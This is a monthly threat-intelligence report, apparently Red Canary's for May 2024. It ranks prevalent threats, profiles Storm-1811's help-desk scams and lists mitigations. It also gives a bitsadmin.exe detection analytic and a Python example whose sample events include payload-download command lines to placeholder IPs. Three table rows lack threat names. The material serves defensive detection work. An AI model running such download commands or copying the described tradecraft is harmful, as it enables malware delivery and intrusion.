Highlights from May
After dropping out of the rankings last month, Atomic Stealer is back on our top 10 most prevalent threat list. It returned at its highest rank so far in our top 10, in a three-way tie for 2nd with SocGholish and this month’s top 10 newcomer, Storm-1811, which we share more about below.
XMRig activity increased enough to tie for 6th with Mimikatz, making this XMRig’s second appearance on the list after its December 2023 debut. Yellow Cockatoo also returned to the top 10 after a few months of reduced activity.
We had several familiar faces stay on the list in new positions, including Gootloader, which moved up from 8th to 5th, and Scarlet Goldfinch, which dropped from 3rd to 8th. Raspberry Robin, another list regular, fell out of the top 10 altogether in May.
This month’s Top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for May 2024:
| Month's rank | Threat name | Threat description |
|---|---|---|
| ⬆ 1 | | Collection of Python classes to construct/manipulate network protocols |
| ⬆ 2* | Atomic Stealer | Information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets |
| ⬆ 2* | SocGholish | Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code |
| ⬆ 2* | Storm-1811 | Financially motivated threat actor and Black Basta affiliate who uses tech support scams and RMM tools, notably Microsoft Quick Assist, for initial access |
| ⬆ 5 | Gootloader | JScript dropper/downloader that typically poses as a document containing an "agreement," often distributed through search engine redirects |
| ⬇ 6* | Mimikatz | Open source tool that dumps credentials using various techniques |
| ⬇ 6* | XMRig | Monero cryptocurrency miner that is often deployed as a secondary payload |
| ⬇ 8* | | Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives |
| ⬆ 8* | | Malware family capable of a range of behaviors, including DLL side-loading, capturing the screen, and keylogging |
| ⬇ 8* | Scarlet Goldfinch | Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems |
| ⬆ 8* | Yellow Cockatoo | Activity cluster characterized by the delivery of an information stealer and .NET RAT via search engine redirects |
⬆ = trending up from previous month
⬇ = trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Tracking Storm-1811’s help desk scams
Our newcomer to the list this month is Storm-1811. Beginning in late April 2024 and continuing throughout May, Red Canary saw an activity cluster that we are tracking as Storm-1811. This is Microsoft’s name for a financially motivated threat actor that uses social engineering to gain initial access to environments via remote monitoring and management (RMM) tools—including Microsoft Quick Assist—on victim endpoints.
Storm-1811 combines several communication channels to make its social engineering scams more convincing. The actor uses voice phishing (aka vishing), calling users while masquerading as tech support, sometimes after reportedly flooding the users' inboxes with emails. According to Microsoft, recent attacks have also used Microsoft Teams messages to bolster the adversary's credibility as IT staff. The adversary then convinces victims to grant remote access through Microsoft Quick Assist or by downloading and running AnyDesk.
After the adversary gains access, we have observed Storm-1811 using curl to download additional tools such as OpenSSH, ScreenConnect, and NetSupport Manager. Other reported payloads include Impacket, used for lateral movement, and PsExec, used to deploy Black Basta ransomware.
Social engineering attacks are, admittedly, hard to combat. Some mitigation strategies to consider are:
- Training users to verify the identity of IT staff who call them through trusted internal methods, for example confirming identities over a video call or requiring a shared secret such as the serial number of the endpoint in question.
- Quick Assist is installed by default on Windows machines. If it is not in use in your environment, disable or uninstall it.
- Inventory the RMMs that are approved for use in your environment. Investigate security alerts for unapproved RMMs and also suspicious activity related to approved RMMs. If possible, block RMMs commonly used in malicious attacks—for example, NetSupport, AnyDesk and ScreenConnect—that aren’t in use in your environment.
Red Canary also saw Storm-1811 use bitsadmin.exe to download follow-on payloads. This gives us a detection opportunity.
Detection opportunity: Executing the Background Intelligent Transfer Service (bitsadmin.exe) to download files
This pseudo detection analytic identifies execution of the Background Intelligent Transfer Service (bitsadmin.exe) with command-line options that signal a file download. Adversaries like Storm-1811 use bitsadmin.exe to download malware as a way of bypassing application whitelisting solutions. Note that bitsadmin.exe may be used legitimately by some administration software in your environment, so expect to tune the exclusion clause below.
```
process == (bitsadmin)
&&
command_line_includes == (download)
&&
deobfuscated_command_line_includes == (bitsadmin, download)
&&
command_line_does_not_include == (*)
```
Note: * is a placeholder for strings associated with legitimate use of bitsadmin in your environment.
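To show how the four clauses of that analytic fit together, here is an added example (not Red Canary's code or detection engine) that evaluates the same logic over a handful of constructed process-creation events. The `ProcessEvent` type, the `deobfuscate` helper, the `LEGITIMATE_MARKERS` allowlist (standing in for the `*` placeholder) and the hostnames and IP addresses in the sample events are all assumptions made for this example.

```python
"""Toy implementation of the bitsadmin.exe download analytic described above.

Added example, not Red Canary's code. Events, hostnames and addresses are
constructed (IPs come from RFC 5737 documentation ranges).
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    process: str        # image name as reported by the sensor (assumed field)
    command_line: str   # raw command line as reported by the sensor (assumed field)


# Stands in for the "*" placeholder in the analytic: substrings that mark
# bitsadmin use known to be legitimate in a given environment (hypothetical).
LEGITIMATE_MARKERS = ("updates.corp.example.com",)


def deobfuscate(command_line: str) -> str:
    """Undo cheap cmd.exe-style obfuscation: caret escapes, stray double
    quotes and repeated whitespace. Lowercased so matching is case-insensitive."""
    cleaned = command_line.replace("^", "").replace('"', "")
    return re.sub(r"\s+", " ", cleaned).strip().lower()


def is_bitsadmin_download(event: ProcessEvent,
                          allowlist=LEGITIMATE_MARKERS) -> bool:
    """Return True when the event satisfies every clause of the analytic."""
    # process == (bitsadmin)
    if event.process.lower() not in ("bitsadmin", "bitsadmin.exe"):
        return False
    # command_line_includes == (download)
    raw = event.command_line.lower()
    if "download" not in raw:
        return False
    # deobfuscated_command_line_includes == (bitsadmin, download)
    deob = deobfuscate(event.command_line)
    if "bitsadmin" not in deob or "download" not in deob:
        return False
    # command_line_does_not_include == (*): environment-specific exclusions
    if any(m.lower() in raw or m.lower() in deob for m in allowlist):
        return False
    return True


def triage(events, allowlist=LEGITIMATE_MARKERS):
    """Run the analytic over a batch; return the indices of events that fire."""
    return [i for i, ev in enumerate(events) if is_bitsadmin_download(ev, allowlist)]


# Constructed sample telemetry.
SAMPLE_EVENTS = [
    # 0: plain download of an unknown payload: should fire
    ProcessEvent("bitsadmin.exe",
                 r"bitsadmin.exe /transfer job1 /download /priority high "
                 r"http://198.51.100.7/payload.dat C:\Users\Public\payload.dat"),
    # 1: same switches, but to the environment's known update host: suppressed
    ProcessEvent("bitsadmin.exe",
                 r"bitsadmin.exe /transfer upd /download /priority normal "
                 r"https://updates.corp.example.com/patch.msi C:\Temp\patch.msi"),
    # 2: no download involved: should not fire
    ProcessEvent("bitsadmin.exe", "bitsadmin.exe /list /allusers"),
    # 3: caret and quote noise around the image name: should still fire,
    #    because the deobfuscated line contains both "bitsadmin" and "download"
    ProcessEvent("bitsadmin.exe",
                 r'"bits^admin.exe" /transfer j2 /download /priority high '
                 r"http://203.0.113.9/x.bin C:\Users\Public\x.bin"),
    # 4: a different image whose arguments merely mention "Downloads": ignored
    ProcessEvent("powershell.exe",
                 r"powershell.exe -c Get-ChildItem C:\Users\Public\Downloads"),
]

if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        print(f"ALERT event {i}: {SAMPLE_EVENTS[i].command_line}")
```

Running it fires on events 0 and 3 only. Event 1 is where the `*` placeholder earns its keep: the same switches against a host you have vetted are dropped by the exclusion clause rather than by weakening the detection itself. Note that the second clause tests the raw command line, so if your telemetry shows noise inside the `download` token itself, evaluate that clause against the deobfuscated line as well.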
In case you missed it: Open your scripts with Notepad
Many malware families use scripts as part of their intrusions. Scripts have been popular with adversaries for years, a trend that shows no sign of slowing down. These lures come in multiple script types, including JavaScript, and can be delivered in multiple ways.
If a trusting user opens such a malicious script, one way to mitigate its execution is to create a Group Policy Object (GPO) that changes the default handler for commonly misused script extensions, so that they behave like benign text files that open in Notepad rather than executing automatically. On May 31, Jeff Felling and Red Canary published a blog about recent prevalent threats like SocGholish and Gootloader that use this technique, and shared specific details on how to create these GPOs to help protect your environment.